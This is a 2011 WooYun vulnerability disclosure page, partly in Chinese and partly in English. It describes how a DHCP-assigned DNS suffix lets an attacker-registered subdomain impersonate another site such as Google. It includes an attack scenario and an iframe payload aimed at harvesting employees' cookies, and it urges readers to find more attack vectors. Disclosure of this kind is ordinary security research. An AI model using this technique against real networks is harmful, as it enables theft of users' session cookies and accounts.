当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-02113

漏洞标题:Dns-suffix may lead to cross-domain and other security problems

相关厂商:OS

漏洞作者: 我勒个去

提交时间:2011-05-13 12:03

修复时间:2011-05-13 12:06

公开时间:2011-05-13 12:06

漏洞类型:设计错误/逻辑缺陷

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2011-05-13: 积极联系厂商并且等待厂商认领中,细节不对外公开
2011-05-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

这种设计会造成一定的安全问题 xp和linux都测试成功

详细说明:

We all know that dhcpd can set the dns suffix for its clients. For example , If we set the dns suffix as "test.com". While doing the domain name resolution  such as www.xxx.com , all the client using this dhcp server will try the following order.
1. System tries to look up www.xxx.com if the dns find a IP addr , the client will go on use this ip.
2. Otherwise , the system will automatically add the dns suffix to have another try(This is partly true cos win7 only add dns suffix to the dns name doesn't contain a '.' ). This time will be www.xxx.com.test.com .If the dns return the found addr, program will happily use this result as its right answer .This did bring some  convenient, but may lead to some problem, for example cross-domain.

漏洞证明:

Scenario :
1.Company A.COM provide secondary domain registation for their customers ( eg. free blog system) .People can register any username they want, from example test . Then his space will be test.A.com. This works fine.
2.Company's internal network using a dhcp server which automatically adds an A.COM dns suffix to their client.
An attack wanna gather some employees' gmail account. He then can easily register a username like hack.www.google.com then the full domain name will be hack.www.google.com.A.com
When A.com 's employees browser the web site contains a iframe such as
<iframe src="https://hack.www.google.com/accounts" >fuck it up</iframe>
Employees's system will
1. try to resolve hack.www.google.com then get a false answer(NX Domain).
2.then try hack.www.google.com.A.com will get attacker's host IP addr.!!!
But the browser doesn't know this & will happily send google's cookies to the attacker's web server.
Success on windows XP /Linux Ubuntu 11.04 IE FF Chrome~:) Failed on win7 cos its only add dns suffix to the dnsname doesn't contain a '.'
GAME OVER!!!
Use your brains and think more potential attack vectors!!

修复方案:

fix lib

版权声明:转载请注明来源 我勒个去@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:10 (WooYun评价)